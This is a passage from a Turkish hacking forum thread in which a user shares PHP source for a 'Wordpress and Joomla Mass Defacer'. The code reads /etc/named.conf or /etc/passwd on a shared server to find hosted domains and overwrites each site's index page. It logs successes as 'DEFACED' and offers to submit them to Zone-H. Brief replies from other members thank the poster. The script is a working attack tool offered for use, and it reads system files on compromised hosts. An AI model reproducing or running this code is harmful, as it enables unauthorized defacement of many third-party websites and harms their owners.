'<tr '.$cls.'><td align="center">'.($j++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo 
'<td align="center"><font color="yellow">WORDPRESS</font></td>';
$res index_changer_wp($config02$def);
echo 
'<td>'.$res['output'].'</td>';
if(
$res['cond']) {
echo 
'<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output'http://'.$domain."<br>");
$count2++;
} else {
echo 
'<td align="center"><span class="red">FAILED</span></td>';
}
echo 
'</tr>';
        }
    }
    echo 
'</table>';
    echo 
'<hr/>';
    echo 
'Total Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';
    echo 
'<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';
    if(
$count1+$count2 0){
        echo 
'<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';
    }
}
echo 
'<!DOCTYPE html>
<html>
<head>
<title>Joomla ~ Wordpress Mass Defacer</title>
<link href="http://fonts.googleapis.com/css?family=Orbitron:700" rel="stylesheet" type="text/css">
<style type="text/css">
table,body {
background: 
url("https://d33ds.co/img/bg3.png") repeat , 
url("https://d33ds.co/img/bglight.png") no-repeat center top,top left,top right, 
url("https://d33ds.co/img/bg2.png") repeat top left;
background-color: #ffffff;
color:white;
font-family: "Trebuchet MS",Arial;background-attachment:fixed;margin:0;padding:0;}
.header {position:fixed;width:100%;top:0;background:#000;}
.footer {position:fixed;width:100%;bottom:0;background:#000;}
input[type="submit"]{background-color:rgba(25,25,25,0.6);border:1; padding:2px; border-bottom:2px solid white; font-size:25px;font-family:orbitron; color:red;border:2px solid white;margin:4px 4px 8px 0;}
input[type="submit"]:hover{color:SeaShell;}
input[type="text"]:hover{color:SeaShell;}
input[type="radio"]{margin-top: 0;}
.td2 {border-left:1px solid red;border-radius: 2px 2px 2px 2px;}
input[type="text"] {background:#111111; border:1; padding:2px; border-bottom:2px solid #393939;font-family:orbitron; font-size:25px; color:#ffffff;border:2px solid #4C83AF;margin:4px 4px 8px 0;}
.even {background-color: rgba(25, 25, 25, 0.6);}
.odd {background-color: rgba(102, 102, 102, 0.6);}
a {color:#fff;} a:hover {color:#00BFFF;}
fieldset{border: 1px solid grey; background: rgba(0,0,0,0.7); width: 600px; margin: 0 auto;min-height:240px;}
textarea{background: rgba(0,0,0,0.6); color: white;}
.green {color:#00FF00;font-weight:bold;}
.red {color:#FF0000;font-weight:bold;}
.killme {position: fixed; top: 20px; right: 20px; border: 2px solid yellow; padding: 10px; font-size: 20px; color: red; font-weight: bold;}
 </style>
<script type="text/javascript">
function change() {
if(document.getElementById(\'rcd\').checked == true) {
document.getElementById(\'tra\').style.display = \'\';
} else {
document.getElementById(\'tra\').style.display = \'none\';
}
        }
        function hide() {
document.getElementById(\'tra\').style.display = \'none\';
        }
    </script>
</head>
<body>
<div class="footer">
<h3 style="text-align: center;">&copy; K2ll33d&nbsp;&nbsp;<a href="http://facebook.com/k2ll33d" target="_blank"><img src="https://fbstatic-a.akamaihd.net/rsrc.php/yP/r/Ivn-CVe5TGK.ico" width=30></a></h3>
</div>
<h2 style="color:#00ff00;text-align: center;font-family:orbitron;text-shadow: 6px 6px 6px black;">Wordpress and Joomla Mass Defacer</h2>'
;
if(!isset(
$_POST['form_action']) && !isset($_GET['zh']) && !isset($_GET['mode']) && !isset($_GET['kill'])){
echo 
'<div align="center">
<form action="" method="post">
<table>
<tr><td><input type="radio" value="1" name="mode" checked="checked" onclick="hide();"></td><td>using /etc/named.conf ('
.(is_readable('/etc/named.conf')?'<span class="green">READABLE</span>':'<span class="red">NOT READABLE</span>').')</td></tr>
<tr><td><input type="radio" value="2" name="mode" onclick="hide();"></td><td>using /etc/passwd ('
.(is_readable('/etc/passwd')?'<span class="green">READABLE</span>':'<span class="red">NOT READABLE</span>').')</td></tr>
<tr><td><input type="radio" value="2" name="mode" id="rcd" onclick="change();"></td><td>manual copy of /etc/passwd</td></tr>
<tr id="tra" style="display: none;"><td></td><td><textarea cols="40" rows="5" name="man_data"></textarea></td></tr>
</table>
<br />
<input type="hidden" name="form_action" value="1">
<table>
<tr><td><b>index url: </b><input size="35" type="text" name="defpage" value=""></tr></td>
</table>
<input class=submit type="submit" value="Attack !" name="Submit">
</form>'
;
    }
$milaf_el_index $_POST['defpage'];
    if(
$_POST['form_action'] == 1) {
if(
$_POST['mode']==1) { exec_mode_1($milaf_el_index$hacker); }
if(
$_POST['mode']==2) { exec_mode_2($milaf_el_index); }
if(
$_POST['mode']==3) { exec_mode_3($milaf_el_index); }
    }
    if(
$_GET['mode']==1) { exec_mode_1($milaf_el_index); }
    echo 
'</body>
</html>'

(Bu konu en son: 17.08.2014 Tarihinde, Saat: 21:36 düzenlenmiştir. Düzenleyen: H4CK4L.)

Dans ederken görülenler deli sanılır, Müziği duymayanlar tarafından.
Alinti
#H4CK4L
*
avatar
#R00T
Durum: Çevrimdışı
Seviye Puanı: 42
Yaşam Puanı: 1,049 / 1,049
Deneyim: 97 / 100
Rep Sayısı: 1029
Mesaj Sayısı: 2992
Üyelik Tarihi: 04.05.2013
      
Yorum: #2
Cvp: Joomla - Wp Mass Shell
17.08.2014 21:37
daha önce paylaşmıtım aynısımı bilmiyorum bakmak gerek Smile

Çocukken her akşam yatmadan önce Tanrı'ya bana bir bisiklet vermesi için dua ederdim. Bir gün Tanrı'nın çalışma tarzının bu olmadığını anladım. Ertesi gün gittim kendime yeni bir bisiklet çaldım ve her akşam yatmadan önce Tanrı'ya günahlarımı affetmesi için dua ettim.
Alinti
Stallk3r
*
avatar
Albay
Durum: Çevrimdışı
Seviye Puanı: 33
Yaşam Puanı: 733 / 824
Deneyim: 97 / 100
Rep Sayısı:
Mesaj Sayısı: 1610
Üyelik Tarihi: 06.11.2013
     
Yorum: #3
Cvp: Joomla - Wp Mass Shell
17.08.2014 22:31
görmedim abim Smile

Dans ederken görülenler deli sanılır, Müziği duymayanlar tarafından.
Alinti
DeadLiner
*
avatar
Yüzbaşı
Durum: Çevrimdışı
Seviye Puanı: 10
Yaşam Puanı: 18 / 237
Deneyim: 49 / 100
Rep Sayısı: 6
Mesaj Sayısı: 131
Üyelik Tarihi: 02.08.2014
     
Yorum: #4
Cvp: Joomla - Wp Mass Shell
18.08.2014 12:43
Eline sağlık yinede Exciting
Alinti
Stallk3r
*
avatar
Albay
Durum: Çevrimdışı
Seviye Puanı: 33
Yaşam Puanı: 733 / 824
Deneyim: 97 / 100
Rep Sayısı:
Mesaj Sayısı: 1610
Üyelik Tarihi: 06.11.2013
     
Yorum: #5
Cvp: Joomla - Wp Mass Shell
18.08.2014 17:03
Eyvallahh Smile

Dans ederken görülenler deli sanılır, Müziği duymayanlar tarafından.
Alinti



1 Ziyaretçi